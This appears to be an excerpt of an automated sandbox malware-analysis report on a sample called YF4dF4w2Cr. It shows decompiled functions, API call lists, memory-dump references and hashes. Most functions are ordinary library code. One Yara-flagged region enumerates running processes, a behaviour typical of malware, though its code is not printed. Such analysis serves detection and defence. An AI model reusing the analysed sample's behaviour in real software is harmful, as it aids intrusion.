                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Item
                  • String ID:
                  • API String ID: 369458955-0
                  • Opcode ID: 68f76c8b40c0a4f109fccf0564f6876d2fd39e1f2526f7d48fb36ded73cfd4b3
                  • Instruction ID: e83c7ebf38d33043e2068e8d2e03b0507baf608e2471e865396bf5c0c4cbf0b1
                  • Opcode Fuzzy Hash: 68f76c8b40c0a4f109fccf0564f6876d2fd39e1f2526f7d48fb36ded73cfd4b3
                  • Instruction Fuzzy Hash: 7D01843600151AF7CB326F62CC04E9F3A25AF853A4F154436FC04B9690EB39CD19A6ED
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404E93, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                  Download Yara Rule
                  C-Code - Quality: 80%
                  			E00404E93(intOrPtr __ecx) {
				intOrPtr _v8;
				long _v12;
				struct HWND__* _t21;
				intOrPtr* _t30;

				_push(__ecx);
				_push(__ecx);
				_v8 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x20)) != 0) {
					_t30 = E0040474E(__ecx);
					_t21 =  *(_t30 + 0x20);
					_v12 = SetWindowLongA(_t21, 0xfffffff0, GetWindowLongA(_t21, 0xfffffff0) & 0xffff7fff);
					E00404A2E(_v8);
					if(IsWindow(_t21) != 0) {
						SetWindowLongA(_t21, 0xfffffff0, _v12);
						 *((intOrPtr*)( *_t30 + 0x178))(1);
					}
					return 1;
				} else {
					return 0;
				}
			}







                  0x00404e98
                  0x00404e99
                  0x00404e9e
                  0x00404ea1
                  0x00404eaf
                  0x00404eb1
                  0x00404ed1
                  0x00404ed4
                  0x00404ee2
                  0x00404eea
                  0x00404ef2
                  0x00404ef2
                  0x00404eff
                  0x00404ea3
                  0x00404ea6
                  0x00404ea6

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Long
                  • String ID:
                  • API String ID: 847901565-0
                  • Opcode ID: 1ae47132c50d68974ba8675a73dd19e1812ace48a7251e8b5cf853d1bf8cc61d
                  • Instruction ID: 4249becefff12f9aa532041eef5b774ba33af07bc398f959ababbc606d27a936
                  • Opcode Fuzzy Hash: 1ae47132c50d68974ba8675a73dd19e1812ace48a7251e8b5cf853d1bf8cc61d
                  • Instruction Fuzzy Hash: E80186B5204214BBDB009B75CC45E9B76ACFF85335F150769F522E32D1DB74D8018A68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004122AD, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E004122AD(intOrPtr __ecx, CHAR* _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				struct HRSRC__* _t10;
				void* _t13;
				void* _t18;
				void* _t20;
				void* _t21;
				struct HINSTANCE__* _t23;

				_push(__ecx);
				_push(_t20);
				_t13 = 0;
				_t18 = 0;
				_v8 = __ecx;
				_t24 = _a4;
				if(_a4 == 0) {
					L4:
					_t21 = E00411E27(_v8, _t18, _t18);
					if(_t18 != 0 && _t13 != 0) {
						FreeResource(_t13);
					}
					_t7 = _t21;
				} else {
					_t23 =  *(E0041F363(0, 0, _t20, _t24) + 0xc);
					_t10 = FindResourceA(_t23, _a4, 0xf0);
					if(_t10 == 0) {
						goto L4;
					} else {
						_t7 = LoadResource(_t23, _t10);
						_t13 = _t7;
						if(_t13 != 0) {
							_t18 = LockResource(_t13);
							goto L4;
						}
					}
				}
				return _t7;
			}















                  0x004122b2
                  0x004122b4
                  0x004122b6
                  0x004122b8
                  0x004122ba
                  0x004122bd
                  0x004122c0
                  0x004122f4
                  0x004122fd
                  0x00412301
                  0x00412308
                  0x00412308
                  0x0041230e
                  0x004122c2
                  0x004122c7
                  0x004122d3
                  0x004122db
                  0x00000000
                  0x004122dd
                  0x004122df
                  0x004122e5
                  0x004122e9
                  0x004122f2
                  0x00000000
                  0x004122f2
                  0x004122e9
                  0x004122db
                  0x00412314

                  APIs
                  • FindResourceA.KERNEL32(?,?,000000F0), ref: 004122D3
                  • LoadResource.KERNEL32(?,00000000), ref: 004122DF
                  • LockResource.KERNEL32(00000000), ref: 004122EC
                  • FreeResource.KERNEL32(00000000), ref: 00412308
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  • String ID:
                  • API String ID: 1078018258-0
                  • Opcode ID: 332a509225835964b8b30f771263e14b9896a6b914ce92aa81eca866c340bb78
                  • Instruction ID: eb341e2990d3aa9b8187f0255b35ca994ee6d51934ff18c2a607a87465d7b55a
                  • Opcode Fuzzy Hash: 332a509225835964b8b30f771263e14b9896a6b914ce92aa81eca866c340bb78
                  • Instruction Fuzzy Hash: EFF0AF373002066B97115FE79D84AAFBAACEB82660704407ABE05E3201DEB8DD51C668
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040D2F2, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040D2F2(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;
				void* _t21;
				void* _t22;
				void* _t23;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E0041FDA4(_t21, _t22, _t23, _a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						return 1;
					}
				}
			}










                  0x0040d2fe
                  0x0040d363
                  0x00000000
                  0x0040d306
                  0x0040d306
                  0x0040d30c
                  0x00000000
                  0x0040d329
                  0x0040d332
                  0x0040d33e
                  0x0040d344
                  0x0040d34a
                  0x0040d34e
                  0x0040d34e
                  0x0040d358
                  0x00000000
                  0x0040d360
                  0x0040d30c

                  APIs
                  • GetObjectA.GDI32(00000000,0000000C,?), ref: 0040D332
                  • SetBkColor.GDI32(00000000,00000000), ref: 0040D33E
                  • GetSysColor.USER32(00000008), ref: 0040D34E
                  • SetTextColor.GDI32(00000000,?), ref: 0040D358
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Color$ObjectText
                  • String ID:
                  • API String ID: 829078354-0
                  • Opcode ID: 0917485d60be57fba84de33db906499c11b2f6a15f302fa225eb6ba83a7df9d6
                  • Instruction ID: bff7330aa8aa4276d550d16e5f7a19a6b3b1f139b7051842c5f6b980f89d7a30
                  • Opcode Fuzzy Hash: 0917485d60be57fba84de33db906499c11b2f6a15f302fa225eb6ba83a7df9d6
                  • Instruction Fuzzy Hash: 27014F35900108ABDF215FB5DC89AAF3BA5FB45314F188132FD51E22E0C734CC99CA5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E1943, Relevance: 6.0, APIs: 4, Instructions: 37processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 023E1954
                  • Process32FirstW.KERNEL32(00000000,?), ref: 023E1973
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 023E1983
                  • CloseHandle.KERNEL32(00000000), ref: 023E199F
                    • Part of subcall function 023E2255: GetCurrentProcessId.KERNEL32(?,00000000,?,?,023E199A,0000022C), ref: 023E2273
                    • Part of subcall function 023E2255: GetCurrentProcessId.KERNEL32(?,00000000,?,?,023E199A,0000022C), ref: 023E2284
                    • Part of subcall function 023E2255: lstrcpyW.KERNEL32(00000004,?), ref: 023E22B6
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentProcessProcess32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                  • String ID:
                  • API String ID: 210870473-0
                  • Opcode ID: cbcf0a21b3b072b40498ab5d716a8c0b949bd57f6c332687393129b697b02eeb
                  • Instruction ID: 5da687969c9d583d8d492b11ab89a99e272f4cdbff6ec3026c77e2879d91c6f9
                  • Opcode Fuzzy Hash: cbcf0a21b3b072b40498ab5d716a8c0b949bd57f6c332687393129b697b02eeb
                  • Instruction Fuzzy Hash: B9F096B19421287ADB206679BC4CBAF777CDB49320F104551FD4AD21C5E7708D198AE1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00439212, Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E00439212(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x45e250);
				E00431818(__ebx, __edi, __esi);
				_t28 = E00436178(__ebx, __edx, __edi, _t30);
				_t13 =  *0x463b44; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0043A0BF(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x463c28; // 0x25e10f8
					 *((intOrPtr*)(_t29 - 0x1c)) = E004391D4(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E0043927C();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00436178(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0043395F(_t25, _t26, 0x20);
				}
				return E0043185D(_t28);
			}







                  0x00439212
                  0x00439212
                  0x00439212
                  0x00439212
                  0x00439212
                  0x00439214
                  0x00439219
                  0x00439223
                  0x00439225
                  0x0043922d
                  0x00439251
                  0x00439253
                  0x00439259
                  0x0043925d
                  0x00439260
                  0x0043926b
                  0x0043926e
                  0x00439275
                  0x0043922f
                  0x0043922f
                  0x00439233
                  0x00000000
                  0x00439235
                  0x0043923a
                  0x0043923a
                  0x00439233
                  0x0043923f
                  0x00439243
                  0x00439248
                  0x00439250

                  APIs
                  • __getptd.LIBCMT ref: 0043921E
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __getptd.LIBCMT ref: 00439235
                  • __amsg_exit.LIBCMT ref: 00439243
                  • __lock.LIBCMT ref: 00439253
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                  • String ID:
                  • API String ID: 3521780317-0
                  • Opcode ID: 8ff576b7292c7b5a6182514ef2947974fe8b5604b36264260ed5e964655f9010
                  • Instruction ID: db5eb218aed7cb5d1a392201fe744ead5517e1896f3a1eef3f233cd93dbba6bc
                  • Opcode Fuzzy Hash: 8ff576b7292c7b5a6182514ef2947974fe8b5604b36264260ed5e964655f9010
                  • Instruction Fuzzy Hash: 96F06232540701AADB64FF66880274E72A05B0D725F11695FE841672D3CBBC9D009B5E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042F2FE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042F2FE(void* __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t26;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				void* _t40;
				intOrPtr _t41;
				signed int _t42;
				void* _t43;

				_t39 = __ecx;
				_t43 = __ecx;
				_t26 = E0041F396(_t36, __ecx, _t40, __ecx, __eflags);
				_t41 =  *((intOrPtr*)(_t26 + 0x3c));
				if(_a4 != 0) {
					_t42 = _a8;
					__eflags =  *(__ecx + 0x3c) & _t42;
					if(__eflags == 0) {
						 *((intOrPtr*)(E0041F363(_t36, _t42, __ecx, __eflags) + 0x38)) = E0042F2EA;
						_t24 = _t43 + 0x3c;
						 *_t24 =  *(_t43 + 0x3c) | _t42;
						__eflags =  *_t24;
					}
				} else {
					_t37 = _a8;
					if(( *(__ecx + 0x3c) & _t37) != 0) {
						_t49 =  *((intOrPtr*)(_t26 + 0x40)) - __ecx;
						if( *((intOrPtr*)(_t26 + 0x40)) == __ecx) {
							E0040D89A(_t39, _t49, 1);
						}
						if(_t41 != 0 &&  *(_t41 + 0x20) != 0) {
							E00431160(_t41,  &_v52, 0, 0x30);
							_t32 =  *((intOrPtr*)(_t43 + 0x20));
							_v44 = _t32;
							_v40 = _t32;
							_v52 = 0x2c;
							_v48 = 1;
							SendMessageA( *(_t41 + 0x20), 0x405, 0,  &_v52);
						}
						 *(_t43 + 0x3c) =  *(_t43 + 0x3c) &  !_t37;
					}
				}
				return 1;
			}



















                  0x0042f2fe
                  0x0042f309
                  0x0042f30b
                  0x0042f314
                  0x0042f317
                  0x0042f379
                  0x0042f37c
                  0x0042f37f
                  0x0042f386
                  0x0042f38d
                  0x0042f38d
                  0x0042f38d
                  0x0042f38d
                  0x0042f319
                  0x0042f319
                  0x0042f31f
                  0x0042f321
                  0x0042f324
                  0x0042f328
                  0x0042f328
                  0x0042f32f
                  0x0042f33f
                  0x0042f344
                  0x0042f34a
                  0x0042f34d
                  0x0042f35e
                  0x0042f365
                  0x0042f36c
                  0x0042f36c
                  0x0042f374
                  0x0042f374
                  0x0042f31f
                  0x0042f397

                  APIs
                  • _memset.LIBCMT ref: 0042F33F
                  • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 0042F36C
                    • Part of subcall function 0040D89A: SendMessageA.USER32(?,00000401,00000000,00000000), ref: 0040D8BF
                    • Part of subcall function 0040D89A: GetKeyState.USER32(00000001), ref: 0040D8D4
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$State_memset
                  • String ID: ,
                  • API String ID: 930327405-3772416878
                  • Opcode ID: 40101904e8074d280dcb2c4609b351c52c5efd4c9a9780d6c8a9c199d9d1a8af
                  • Instruction ID: 7c540c80431b337250ce6ddfd8c45ad52cb60da89bd9e6b3c434e6b46047bbb6
                  • Opcode Fuzzy Hash: 40101904e8074d280dcb2c4609b351c52c5efd4c9a9780d6c8a9c199d9d1a8af
                  • Instruction Fuzzy Hash: EE118F71A00714EFD720DFA2D885B9BB7B4FB44724F94403BE94566A81D3B9A848CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041C884, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041C884(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t23;
				intOrPtr* _t47;
				void* _t48;
				void* _t49;

				_t49 = __eflags;
				E00431A9B(E0044BA0A, __ebx, __edi, __esi);
				E00423242(__ebx, _t48 - 0x14, __edi, __esi, _t49);
				_t47 =  *((intOrPtr*)(_t48 + 8));
				 *(_t48 - 4) =  *(_t48 - 4) & 0x00000000;
				_t23 = E00423194(_t47, _t48 - 0x14);
				 *((intOrPtr*)( *_t47 + 0x50))(_t48 - 0x24, GetSysColor(0xc));
				E0041B463(_t47,  *((intOrPtr*)(_t48 - 0x24)),  *((intOrPtr*)(_t48 - 0x20)),  *((intOrPtr*)(_t48 - 0x1c)) -  *((intOrPtr*)(_t48 - 0x24)),  *((intOrPtr*)(_t48 - 0x18)) -  *((intOrPtr*)(_t48 - 0x20)), 0xf00021);
				E00423194(_t47, _t23);
				 *(_t48 - 4) =  *(_t48 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t48 - 0x14)) = 0x452f4c;
				E0040ADD4(__ebx, _t48 - 0x14, _t23, _t47, _t49);
				return E00431B73(1);
			}







                  0x0041c884
                  0x0041c889
                  0x0041c89a
                  0x0041c89f
                  0x0041c8a2
                  0x0041c8ac
                  0x0041c8bb
                  0x0041c8d9
                  0x0041c8e1
                  0x0041c8e6
                  0x0041c8ed
                  0x0041c8f4
                  0x0041c901

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041C889
                  • GetSysColor.USER32(0000000C), ref: 0041C890
                    • Part of subcall function 00423242: __EH_prolog3.LIBCMT ref: 00423249
                    • Part of subcall function 00423242: CreateSolidBrush.GDI32(?), ref: 00423264
                    • Part of subcall function 00423194: SelectObject.GDI32(?,00000000), ref: 004231BA
                    • Part of subcall function 00423194: SelectObject.GDI32(?,?), ref: 004231D0
                    • Part of subcall function 0041B463: PatBlt.GDI32(?,?,?,?,?,?), ref: 0041B47A
                    • Part of subcall function 0040ADD4: __EH_prolog3_catch_GS.LIBCMT ref: 0040ADDE
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3ObjectSelect$BrushColorCreateH_prolog3_catch_Solid
                  • String ID: L/E
                  • API String ID: 1097662718-2456494276
                  • Opcode ID: e1a511be5031bb41064cd11203baab905edbaed639b95e56e1de4081b40d4594
                  • Instruction ID: 68ff83ec7e2eba05f79b04070f7d705b72ba532b61595986b3c127a4697d77d4
                  • Opcode Fuzzy Hash: e1a511be5031bb41064cd11203baab905edbaed639b95e56e1de4081b40d4594
                  • Instruction Fuzzy Hash: 76010872A001199BCB04EFE9C94AEEEB7F4AF08305F10415AF405B3191CB389E058BA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00426219, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E00426219(void* __ecx, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t9;
				_Unknown_base(*)()* _t12;
				void* _t14;
				void* _t17;
				_Unknown_base(*)()* _t19;
				void* _t20;

				_push(0);
				E00431A9B(E0044C14C, _t14, _t17, __esi);
				if(( *0x4668dc & 0x00000001) == 0) {
					 *0x4668dc =  *0x4668dc | 0x00000001;
					 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
					_push("UxTheme.dll");
					 *0x4668d8 = E0040D5D6(_t14, __ecx, _t17, __esi,  *(_t20 - 4));
				}
				_t9 =  *0x4668d8; // 0x73310000
				_t19 =  *(_t20 + 0xc);
				if(_t9 != 0) {
					_t12 = GetProcAddress(_t9,  *(_t20 + 8));
					if(_t12 != 0) {
						_t19 = _t12;
					}
				}
				return E00431B73(_t19);
			}









                  0x00426219
                  0x00426220
                  0x0042622c
                  0x0042622e
                  0x00426235
                  0x00426239
                  0x00426244
                  0x00426244
                  0x00426249
                  0x0042624e
                  0x00426253
                  0x00426259
                  0x00426261
                  0x00426263
                  0x00426263
                  0x00426261
                  0x0042626c

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00426220
                  • GetProcAddress.KERNEL32(73310000,?), ref: 00426259
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressH_prolog3Proc
                  • String ID: UxTheme.dll
                  • API String ID: 3325816569-352951104
                  • Opcode ID: a4a852b16d3f4d644eb00760bbfc3205726ab498dccf1a41d59192cb352b88aa
                  • Instruction ID: 93154bf1de3ba644c085273ccdfcc23c9d4ad52bd39bf1df4da4c0410343f817
                  • Opcode Fuzzy Hash: a4a852b16d3f4d644eb00760bbfc3205726ab498dccf1a41d59192cb352b88aa
                  • Instruction Fuzzy Hash: 14E06530A012649BDB11BF76AC0571937D8BB04715F46406BFC00E72A1EBB989408B7D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042282A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0042282A(void* __ecx) {
				char _v8;
				intOrPtr* _v12;
				void* _t11;

				_v8 = 0x466638;
				E00430CF4( &_v8, 0x45cfdc);
				asm("int3");
				return  *((intOrPtr*)( *_v12 + 4))(0, _t11, __ecx);
			}






                  0x00422839
                  0x00422840
                  0x00422845
                  0x00422856

                  APIs
                  • __CxxThrowException@8.LIBCMT ref: 00422840
                    • Part of subcall function 00430CF4: RaiseException.KERNEL32(?,?,?,?), ref: 00430D36
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ExceptionException@8RaiseThrow
                  • String ID: 8fF$8fF
                  • API String ID: 3976011213-2798571808
                  • Opcode ID: b981e969448221579f3da19129567584c7e0524e6b7c9e5e8841d6a8c252ee54
                  • Instruction ID: bcc99a705935aa0b096279d8265c82760203fa9d8db396da574b4737db60febc
                  • Opcode Fuzzy Hash: b981e969448221579f3da19129567584c7e0524e6b7c9e5e8841d6a8c252ee54
                  • Instruction Fuzzy Hash: D5D05B7514434CBFC304DBC9D459E8ABBADDBC8714F214156F61887641DBB1FD00C665
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004209F9, Relevance: 5.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 61%
                  			E004209F9(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t31;
				intOrPtr _t32;
				signed int _t38;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr* _t44;
				long* _t47;
				intOrPtr* _t50;

				_push(__ecx);
				_t50 = _a4;
				_t38 = 1;
				_t47 = __ecx;
				_v8 = 1;
				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
					L10:
					_t24 =  &(_t47[7]); // 0x466584
					_t39 = _t24;
					EnterCriticalSection(_t39);
					_t25 =  &(_t47[5]); // 0x46657c
					E00420679(_t25, _t50);
					LeaveCriticalSection(_t39);
					LocalFree( *(_t50 + 0xc));
					 *((intOrPtr*)( *_t50))(1);
					_t31 = TlsSetValue( *_t47, 0);
					L11:
					return _t31;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0) {
						L5:
						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
						if(_t44 != 0) {
							 *((intOrPtr*)( *_t44))(1);
						}
						_t31 =  *(_t50 + 0xc);
						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
						goto L8;
					}
					_t5 =  &(_t47[4]); // 0x5b88a8
					if( *((intOrPtr*)( *_t5 + 4 + _t38 * 8)) == _t32) {
						goto L5;
					}
					_t31 =  *(_t50 + 0xc);
					if( *(_t31 + _t38 * 4) != 0) {
						_v8 = _v8 & 0x00000000;
					}
					L8:
					_t38 = _t38 + 1;
				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
				if(_v8 == 0) {
					goto L11;
				}
				goto L10;
			}











                  0x004209fe
                  0x00420a03
                  0x00420a06
                  0x00420a0b
                  0x00420a0d
                  0x00420a10
                  0x00420a54
                  0x00420a54
                  0x00420a54
                  0x00420a58
                  0x00420a5f
                  0x00420a62
                  0x00420a68
                  0x00420a71
                  0x00420a7d
                  0x00420a83
                  0x00420a89
                  0x00420a8d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420a12
                  0x00420a12
                  0x00420a12
                  0x00420a17
                  0x00420a31
                  0x00420a34
                  0x00420a39
                  0x00420a3f
                  0x00420a3f
                  0x00420a41
                  0x00420a44
                  0x00000000
                  0x00420a44
                  0x00420a19
                  0x00420a20
                  0x00000000
                  0x00000000
                  0x00420a22
                  0x00420a29
                  0x00420a2b
                  0x00420a2b
                  0x00420a48
                  0x00420a48
                  0x00420a49
                  0x00420a52
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • EnterCriticalSection.KERNEL32(00466584,?,00466568,00466584,00466568,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF), ref: 00420A58
                  • LeaveCriticalSection.KERNEL32(00466584,00000000,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A68
                  • LocalFree.KERNEL32(?,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A71
                  • TlsSetValue.KERNEL32(00466568,00000000,?,00420AD8,005BC2E0,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A83
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
